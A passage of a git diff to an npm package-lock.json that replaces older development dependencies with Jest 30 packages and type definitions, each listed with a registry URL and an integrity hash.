"https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, "requires": { - "mimic-fn": "^2.1.0" + "@types/istanbul-lib-coverage": "*" } }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, "requires": { - "yocto-queue": "^0.1.0" + "@types/istanbul-lib-report": "*" } }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, "requires": { - "p-limit": "^2.2.0" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" }, "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1" + } + }, + "@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", + "dev": true, + "requires": { + "@sinclair/typebox": "^0.34.0" + } + }, + "@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", + "dev": true, + "requires": { + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" + } + }, + "@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", + "dev": true + }, + "ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true + }, + "ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", + "dev": true + }, + "expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, "requires": { - "p-try": "^2.0.0" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" + } + }, + "jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", + "dev": true, + "requires": { + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" + } + }, + "jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" + } + }, + "jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", + "dev": true, + "requires": { + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" + } + }, + "jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" + } + }, + "jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" + } + }, + "picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", + "dev": true + }, + "pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", + "dev": true, + "requires": { + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" } } } }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "@types/node": { + "version": "20.4.1", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", + "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", "dev": true }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", + "dev": true + }, + "@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" + "@types/yargs-parser": "*" } }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", "dev": true }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dev": true, "requires": { - "find-up": "^4.0.0" + "color-convert": "^2.0.1" } }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", + "braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } + "fill-range": "^7.1.1" } }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", + "chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dev": true, "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" } }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true + "color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, + "requires": { + "color-name": "~1.1.4" + } }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", + "color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", "dev": true }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", + "fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" + "to-regex-range": "^5.0.1" } }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } + "graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", + "is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" + }, + "micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, "requires": { - "shebang-regex": "^3.0.0" + "braces": "^3.0.3", + "picomatch": "^2.3.1" } }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true }, "slash": { @@ -5970,28 +952,6 @@ "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, "stack-utils": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", @@ -6001,54 +961,6 @@ "escape-string-regexp": "^2.0.0" } }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, "supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", @@ -6058,35 +970,6 @@ "has-flag": "^4.0.0" } }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, "to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", @@ 